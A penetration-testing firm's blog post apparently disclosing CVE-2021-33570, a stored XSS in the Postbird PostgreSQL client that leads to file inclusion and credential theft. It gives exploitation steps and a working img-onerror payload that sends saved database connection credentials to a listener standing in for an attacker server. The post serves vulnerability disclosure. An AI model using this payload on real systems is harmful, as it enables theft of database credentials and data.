• SERVICES
    • Mobile Penetration Testing
    • Cloud Penetration Testing
    • Network Penetration Testing
    • OSINT & Social Engineering
    • Web Application Penetration Testing
    • Vulnerability Assessment
  • ABOUT US
  • CONTACT US
Blog
Menu
  • SERVICES
    • Mobile Penetration Testing
    • Cloud Penetration Testing
    • Network Penetration Testing
    • OSINT & Social Engineering
    • Web Application Penetration Testing
    • Vulnerability Assessment
  • ABOUT US
  • CONTACT US
Home  /  New  /  [CVE-2021-33570] Postbird 0-day Vulnerability
22 May 2022

[CVE-2021-33570] Postbird 0-day Vulnerability

Postbird is a cross-platform PostgreSQL GUI client built on the electron.js framework, widely used by many organizations as well as individuals. On 17th May 2021, a stored XSS vulnerability was discovered by the Tridentsec team in the Postbird application version – 0.8.4. 

The vulnerability was very Critical and exploiting the vulnerability can lead to Data Breach. We were able to inject malicious JavaScript into the application, leading us to two other vulnerabilities, Local File Inclusion(LFI) and PostgreSQL Password Stealing.

How this vulnerability can affect your organization?

Every organization maintains its databases which contain classified information about the organization’s infrastructures, business-related information, credentials, client data, etc. 

Using this vulnerability, an attacker can fetch all this data to his controlled servers. The attackers can also fetch the database credentials that can be used for persistent connection to the database. Hackers can also steal the files located on the Postbird application user’s computer using the LFI vulnerability.

All these possibilities can create a major threat to an organization’s business reputation and can also lead to more severe cyberattacks.

Vulnerability Exploitation

In order to exploit the vulnerability, we need to inject a malicious JavaScript payload in any table which is present in the PostgreSQL database. When the table loads in the Postbird application the JavaScript code automatically gets executed in the background.

A hacker can save this JavaScript code from a website that saves the raw HTML code into the database and steal the files & PostgreSQL credentials in a real scenario.

You can find our Python Proof-of-Concept code & JavaScript payloads for exploiting the LFI and stealing PostgreSQL on our GitHub Repository.

Run our postbird.py Proof-of-Concept code using command python3 postbird.py before executing any attack. 

postbird.py is acting as a fake malicious server deployed by hackers to steal data.

 

Steps to exploit the vulnerability:

  1. Open Postbird application.
  2. Input the payload into any table as data.
  3. Deploy our postbird.py Proof-of-Concept code using command python3 postbird.py 
  4. Reload the table/application to trigger the vulnerability.
  5. Check the data received on the postbird.py server.

Payload for PostgreSQL Password stealing

<img src=”” onerror=”var xhttp = new XMLHttpRequest();xhttp.open(‘GET’, ‘http://127.0.0.1 :5555/?credentials=’+window.localStorage.savedConnections, true);xhttp.send();”>

Comment: Embed this video on the blog – Postbird | CVE-2021-33570 | Tridentsec

Conclusion

The source of all 3 vulnerabilities (Stored XSS, LFI & Insecure Data Storage) is JavaScript Injection in the existing code, allowing us to inject different malicious JavaScript in the database and execute it. The vulnerability has been patched by blocking the execution of HTML or JavaScript stored in the database.

References:

  • CVE-2021-33570
  • https://nvd.nist.gov/vuln/detail/CVE-2021-33570
  • https://github.com/Tridentsec-io/postbird
  • https://www.exploit-db.com/exploits/49910

Related

Share On
Share on Facebook
Share on Twitter
Share on LinkedIn
Share on Whatsapp
 Previous Article Top Cyber Attacks January-May 2021

Related Posts

  • Top Cyber Attacks January-May 2021

    May 22, 2022
  • Mobile Application Security Risks

    May 22, 2022
  • Web Security Risks

    May 22, 2022
  • Matrix-2 Walkthrough

    May 22, 2022

Leave a Reply

Cancel reply

Recent Posts

  • OSINT and It’s Security Risks May 22, 2022
  • Top Cyber Attacks January-May 2021 May 22, 2022
  • [CVE-2021-33570] Postbird 0-day Vulnerability May 22, 2022
  • You have been hacked! What Now? May 22, 2022
  • Is your network infrastructure really secure? May 22, 2022

Popular posts

  • [CVE-2021-33570] Postbird 0-day Vulnerability
  • Top Cyber Attacks January-May 2021
  • Mobile Application Security Risks
  • Web Security Risks
  • Matrix-2 Walkthrough

Related posts

  • You have been hacked! What Now?
  • May 22, 2022
  • Why you need a Vulnerability Assessment?
  • May 22, 2022
  • Mobile Application Security Risks
  • May 22, 2022
  • [CVE-2021-33570] Postbird 0-day Vulnerability
  • Top Cyber Attacks January-May 2021
  • Mobile Application Security Risks
  • Web Security Risks
  • Matrix-2 Walkthrough

Ratest posts

  • Is your network infrastructure really secure? May 22, 2022
  • Web Security Risks May 22, 2022
  • Why you need a Vulnerability Assessment? May 22, 2022
  • Mobile Application Security Risks May 22, 2022
  • [CVE-2021-33570] Postbird 0-day Vulnerability

  • Top Cyber Attacks January-May 2021

  • Mobile Application Security Risks

  • Web Security Risks

Latest Posts

Quick Links

  • SERVICES
    • Mobile Penetration Testing
    • Cloud Penetration Testing
    • Network Penetration Testing
    • OSINT & Social Engineering
    • Web Application Penetration Testing
    • Vulnerability Assessment
  • ABOUT US
  • CONTACT US

We provide a comprehensive range of cybersecurity services to protect your business information and to give you peace of mind

Contact Us

Location: Noida, Uttar Pradesh, India

Whatsapp: +91-726-797-1609

E-mail: hello@tridentsec.io

Follow Us

Subscribe to our blogs